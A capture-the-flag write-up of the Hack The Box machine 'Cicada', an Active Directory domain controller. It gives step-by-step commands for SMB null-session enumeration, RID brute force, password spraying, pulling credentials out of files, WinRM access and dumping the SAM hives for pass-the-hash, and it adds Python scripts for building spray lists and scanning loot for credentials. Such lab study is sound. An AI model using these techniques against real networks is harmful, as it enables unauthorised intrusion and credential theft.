
HTB Writeup: Cicada

Posted: 2024-10-14 19:15:04
Tags: HTB, Windows, target practice, tcp, Cicada, password, open, your

Nmap Scan

Start with an nmap scan of the target IP (-sT TCP connect scan, -sV service versions, -O OS fingerprinting, -Pn skip host discovery since the host drops pings):

nmap -sT -sV -O -Pn 10.10.11.35

Nmap scan report for 10.10.11.35
Host is up (0.012s latency).
Not shown: 989 filtered tcp ports (no-response), 1 filtered tcp ports (host-unreach)
PORT    STATE SERVICE       VERSION
25/tcp  open  smtp?
53/tcp  open  domain        Simple DNS Plus
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-14 16:35:48Z)
110/tcp open  pop3?
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
445/tcp open  microsoft-ds?
464/tcp open  kpasswd5?
593/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized
Running: Microsoft Windows XP|7|2012, VMware Player
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012 cpe:/a:vmware:player
OS details: Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, VMware Player virtual NAT device
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 406.91 seconds

SMB enumeration

Kerberos (88), LDAP (389) and the "Domain: cicada.htb" banner tell us this is a domain controller named CICADA-DC; ignore the OS guess, nmap itself warns it is unreliable without a closed port to compare against. Note that this default scan only covers the top 1000 ports and WinRM (5985/tcp), which we use later, is not in the output, so a full-port scan (-p-) is worth running in the background. Port 445 is open, so list the shares with a null session (-N sends an empty password):

smbclient -N -L //10.10.11.35

The HR share is readable anonymously; connect to it with a null session and look around:

smbclient -N //10.10.11.35/HR

Download "Notice from HR.txt" (get "Notice from HR.txt" inside smbclient). Its contents:

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at [email protected].

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

That gives us a default password, but no username to go with it: Cicada$M6Corpb*@Lp#nZp!8

RID brute force

With no username yet, use the built-in guest account (still enabled here) to brute-force RIDs over SMB and resolve them to account names. The output also lists groups, aliases and built-in accounts, so filter it down to user objects and then to the accounts that look like real people:

crackmapexec smb 10.10.11.35 -u "guest" -p "" --rid-brute|grep "SidTypeUser"

sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
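Piping the raw crackmapexec output through grep still leaves domain prefixes, built-in accounts and the machine account in the list. The script below is an added example (not from the original post) that turns --rid-brute output into a clean spray list: it keeps only SidTypeUser entries, drops computer accounts (names ending in $) and krbtgt, and by default also drops RIDs below 1000 (the built-in Administrator and Guest), which is exactly the four-user list above. The sample output is constructed to look like crackmapexec's format; the RIDs and the group lines are illustrative, not captured from the box.

```python
import re

# Constructed sample of `crackmapexec smb <ip> -u guest -p '' --rid-brute` output.
# Lines are shaped like the real tool's output; RIDs and group entries are
# illustrative and were not captured from the target.
SAMPLE_RID_BRUTE = r"""
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\guest:
SMB         10.10.11.35     445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1104: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1105: CICADA\michael.wrightson (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1106: CICADA\david.orelious (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)
"""

# "<rid>: DOMAIN\name (SidTypeXxx)" at the end of a line; names may contain spaces.
RID_LINE = re.compile(
    r"(?P<rid>\d+):\s+(?P<dom>[^\\\s]+)\\(?P<name>.+?)\s+\((?P<kind>SidType\w+)\)\s*$"
)

# krbtgt is disabled by design and can never be sprayed.
NEVER_SPRAY = {"krbtgt"}


def parse_rid_brute(output):
    """Yield (rid, name, kind) for every SID crackmapexec managed to resolve."""
    for line in output.splitlines():
        m = RID_LINE.search(line)
        if m:
            yield int(m["rid"]), m["name"], m["kind"]


def spray_candidates(output, include_builtin=False):
    """Return a sorted, de-duplicated list of user accounts worth spraying.

    Computer accounts (trailing '$') and krbtgt are always dropped; built-in
    accounts (RID < 1000, i.e. Administrator and Guest) only if include_builtin
    is False, which matches the hand-filtered list in the writeup.
    """
    users = set()
    for rid, name, kind in parse_rid_brute(output):
        if kind != "SidTypeUser" or name.endswith("$") or name.lower() in NEVER_SPRAY:
            continue
        if not include_builtin and rid < 1000:
            continue
        users.add(name)
    return sorted(users, key=str.lower)


if __name__ == "__main__":
    # Write the list in the form crackmapexec's -u <file> expects, one user per line.
    with open("user.txt", "w") as fh:
        fh.write("\n".join(spray_candidates(SAMPLE_RID_BRUTE)) + "\n")
    print("\n".join(spray_candidates(SAMPLE_RID_BRUTE)))
```

Feed real output in via stdin or a file instead of the constructed sample; the parser is the same. Keep Administrator out of the first spray round unless you have checked the lockout policy, since a locked domain admin is noisy.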

Spray the default password from the HR notice across that user list (user.txt holds the four names above). One password against each user keeps the attempt count per account at one; check the lockout policy before trying more than that:

crackmapexec smb 10.10.11.35 -u user.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

Valid credentials: michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

enum4linux-ng scan

With a working domain account, run enum4linux-ng to collect everything SMB and LDAP will hand out: users, groups, shares, the password policy and, importantly, the per-user description fields (-A runs all checks, -t 10 sets a 10 s timeout):

enum4linux-ng -A -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' 10.10.11.35 -t 10

The user listing includes a password that someone left in an account description: david.orelious:aRt$Lp#7t*VQ!3

Connect to the DEV share as david.orelious (the password is entered at the prompt):

smbclient //10.10.11.35/DEV -U 'david.orelious'

Download Backup_script.ps1; it has a credential hard-coded in it:

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

Credentials: emily.oscars:Q!3@Lp#M6b*7t*Vt
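Both footholds on this box come from credentials sitting in plain files on readable shares: a default password in an HR notice and a PowerShell script that builds a PSCredential from a literal string. When a share is large, reading every file by hand does not scale. The script below is an added example (not part of the original writeup) that scans downloaded loot for the patterns seen here: a `ConvertTo-SecureString "..." -AsPlainText` literal, a prose "password is:" line, and a generic `password=`/`password:` assignment, and then looks a few lines above each hit for a username assignment so the pair can go straight into a spray. The two sample files are constructed from the excerpts above, trimmed to the relevant lines.

```python
import re
from typing import List, NamedTuple, Optional

# Constructed copies of the two files pulled from the HR and DEV shares,
# trimmed to the lines that matter (full text is quoted earlier in the post).
LOOT = {
    "Notice from HR.txt": (
        "Welcome to Cicada Corp! We're thrilled to have you join our team.\n"
        "Your default password is: Cicada$M6Corpb*@Lp#nZp!8\n"
        "Remember, your password is a crucial aspect of keeping your account secure.\n"
    ),
    "Backup_script.ps1": (
        '$username = "emily.oscars"\n'
        '$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force\n'
        "$credentials = New-Object System.Management.Automation.PSCredential($username, $password)\n"
    ),
}

# Most specific first: a line is reported once, under the first rule that hits.
SECRET_RULES = [
    ("powershell-securestring",
     re.compile(r'ConvertTo-SecureString\s+"(?P<secret>[^"]+)"\s+-AsPlainText')),
    ("prose-password-is",
     re.compile(r"password\s+is\s*:\s*(?P<secret>\S+)", re.I)),
    ("generic-assignment",
     re.compile(r"""(?:password|passwd|pwd)\s*[:=]\s*["']?(?P<secret>[^"'\s]+)""", re.I)),
]

# "$username = "x"", "user: x", "login=x" and similar, used to pair a secret with a user.
USER_RULE = re.compile(r"""\$?(?:user(?:name)?|login)\s*[:=]\s*["']?(?P<user>[^"'\s]+)""", re.I)


class Hit(NamedTuple):
    file: str
    line: int          # 1-based line number of the secret
    rule: str
    user: Optional[str]  # None when no username was found nearby
    secret: str


def _username_near(lines, idx, window=5):
    """Look up to `window` lines above index `idx` for a username assignment."""
    for line in reversed(lines[max(0, idx - window):idx]):
        m = USER_RULE.search(line)
        if m:
            return m["user"]
    return None


def find_credentials(files) -> List[Hit]:
    """Scan {filename: text} and return every credential-looking line."""
    hits = []
    for name, text in files.items():
        lines = text.splitlines()
        for idx, line in enumerate(lines):
            for rule, rx in SECRET_RULES:
                m = rx.search(line)
                if m:
                    hits.append(Hit(name, idx + 1, rule, _username_near(lines, idx), m["secret"]))
                    break
    return hits


if __name__ == "__main__":
    for h in find_credentials(LOOT):
        who = h.user or "<unknown user: RID-brute for candidates>"
        print(f"{h.file}:{h.line} [{h.rule}] {who} -> {h.secret}")
```

The HR hit comes back with no user, which is exactly why the RID brute force step was needed; the PowerShell hit already carries emily.oscars. Point `LOOT` at a directory walk over your downloaded share contents to use it for real.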

WinRM login

evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i 10.10.11.35

whoami /all shows that emily.oscars is a member of Backup Operators and holds SeBackupPrivilege. That privilege lets a process open any file or registry hive for reading regardless of its ACL, so the SAM and SYSTEM hives can be saved straight out of the registry. Export both into a temp directory (the session was painfully laggy):

reg save hklm\sam sam.hive
reg save hklm\system system.hive

SYSTEM is needed alongside SAM because the boot key that encrypts the SAM password hashes lives in the SYSTEM hive. Pull both files back with evil-winrm's built-in download command:

download sam.hive
download system.hive

The download stalled for ages but eventually completed. Offline, Impacket's secretsdump.py in LOCAL mode takes the two hive files, derives the boot key from SYSTEM, decrypts SAM and prints the Administrator NTLM hash. evil-winrm accepts that hash directly with -H, so pass-the-hash as Administrator and read root.txt. Delete the hive copies from the target afterwards; they are credential material you left behind.

From: https://www.cnblogs.com/F12-blog/p/18464782
